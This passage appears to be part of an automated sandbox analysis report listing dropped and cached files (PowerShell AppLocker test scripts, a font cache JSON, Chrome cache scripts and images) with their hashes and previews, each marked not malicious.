SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2lcjjp3p.020.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gwumdlo.p4s.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3khbtkcy.rp5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ysucssc.2dr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aduedr3n.s5h.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anqodbyw.saf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aqtvs2ya.zco.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avralbsy.uaa.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blp1ielw.kfs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ckrqfvqj.l5q.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cnuqem2l.bnu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fcogsjy1.n0s.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhx1bxzl.wz2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gah2jnqp.cxo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbkvye10.czz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhq4ju51.ry1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p1adzuks.vii.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rktsdcwa.pch.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rto5l2sw.tyw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_si0yyfvm.ydi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twrtz3ib.vwg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x5dlfkso.xud.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z4d5sxdc.ecb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Chrome Cache Entry: 254

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 255

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3533)
Category:	dropped
Size (bytes):	226660
Entropy (8bit):	5.451557875371089
Encrypted:	false
SSDEEP:	6144:BFufmdIbWdPP9g+iC+2OSKI4p/hpkWI4jchv:aedIeeScwv
MD5:	B8F73CA15B82A59E06E0AFD7AFD4732B
SHA1:	785735EE29AE9815BE63D99530439F698CE08EB9
SHA-256:	0661EECDC8F9A86CBEAB346D02D85524CFAD9FA7E159EB9B10BDF5F58FFE86F1
SHA-512:	4C026E1E1DDB622F4578BFEE979FECE8CA2FABE9AD13CD3CDF983B8975EE91339415F73076DBC6407C64CA0B801EA0C18605BE783B30C27212E8AD92E553164F
Malicious:	false
Reputation:	unknown
Preview:	(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");},da=.ca(this),p=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.p("Symbol",function(a){if(a)return a;var b=function(f,g){this.Jg=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.Jg};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e

Chrome Cache Entry: 256

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2093)
Category:	downloaded
Size (bytes):	445169
Entropy (8bit):	5.576763109779436
Encrypted:	false
SSDEEP:	12288:UrLbjvudFZTeHPGv7maR3WCdt4+/x3149jaxfR1tKaGcK0h3XJyx0sC1KP9IjYFv:UrLbjvudFZTeHPGv7maR3Wgt4+/x314P
MD5:	47CE2929610695531FCE8681456CA07B
SHA1:	E9D9423F2E24886C0E0F21D5F54AE5B0B0573B4F
SHA-256:	E45BD4331AF73638C4934B6A1D12BFAC55D18CC484E23D69C39BFD4876582B96
SHA-512:	58D880492F44C4FD1D24337E8401F031C89D35E4DA9E264B119F2C47D11EC606E563C7AC4F39BAB943E5015BA0B0387CA1FD86D239C7EB3CCE3E80415B2BEB76
Malicious:	false
Reputation:	unknown
URL:	https://pagead2.googlesyndication.com/pagead/managed/js/adsense/m202410240101/show_ads_impl_fy2021.js
Preview:	(function(sttc){'use strict';var q,aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var ca=ba(this),da=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",ea={},fa={};function ia(a,b,c){if(!c\|\|a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ja(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in ea?f=ea:f=ca;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=da&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?aa(ea,d,{configurable:!0,writable:!0,value:b}):b!==c&&(fa[d]===void 0&&(a=Math.random()*1E9>>>0,fa[d]=da?ca.Symbol(d):"$jscp$"+a+"

Chrome Cache Entry: 257

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
Category:	downloaded
Size (bytes):	205
Entropy (8bit):	6.471232950817362
Encrypted:	false
SSDEEP:	6:6v/lhPmvbPM6ArwrgPowQka3cQhWb8i4NI1Q/2up:6v/7OvzZ6IRwIcQEb7461Q2c
MD5:	4087858E2C9DB9AA8F6A840AEDCFB533
SHA1:	D1FFE861DA6BD0E95FD1A365B0C3D3CEB6CD58A3
SHA-256:	4D45982F2DC34F36C9045EE46A75A1943666BB7FD64E103CAC8C7429E7012840
SHA-512:	541228667C513266FFAC017AA43CCACEA410E20BF27D30599276E9984FAC2C433AC58288C19F7A5BFEB1C9B4074B8C9C472080BF1C706303F97B2CE73DBD634F
Malicious:	false
Reputation:	unknown
URL:	https://www.gstatic.com/images/icons/material/system/2x/feedback_grey600_24dp.png
Preview:	.PNG........IHDR...0...0.......1.....IDATx...1..1.DQ.f....@H.....%`..j.M&"....5....;...;.......\.....\..U.4..pe.<.P.....%... ...@....p.....@...X...5..{.$.x^....y=..z.......\|.......+.........IEND.B`.

Chrome Cache Entry: 258

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1200 x 628, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	8408
Entropy (8bit):	7.45689599658159
Encrypted:	false
SSDEEP:	96:MdN09f9qB+ejVmTSiMYAJLCc7466kYuZMXcOmAa4mVxrcuQPvsvtKWiqxjUBqfCz:MdWu2PMLLCX66k51qmHISVi/Bnzyvgl
MD5:	111C3C3166CD346227E1B8DF135C02B5
SHA1:	C85469F31C39294A19497B2BBC77E3828670BA47
SHA-256:	53C2BE47E0400F4B66686EF32CB9C6B726720EBD16B81B2AA1A883CC83F8C59E
SHA-512:	AEB83AC0BB3BC705C3F9E074B2253A085997D95C1530CFBF7387E07579B24A014016FD2FB8B9C63941A6B5F653A975BBA84AD4B6B50CD22E97F504618842D871
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/simgad/12056283273911786548/14763004658117789537
Preview:	.PNG........IHDR.......t.....5V*e....PLTE.w.......................................y.....M\|..........,..k.....z..(.....:.....W...{.............&........=..l...........a...........E..O.....s.....x...h..\..w................W.1.....iTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x='adobe:ns:meta/'>. <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>VIEW - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2024-08-02</Attrib:Created>. <Attrib:ExtId>f2021086-289e-41ea-b556-3cdc24c81957</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchT

Chrome Cache Entry: 259

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
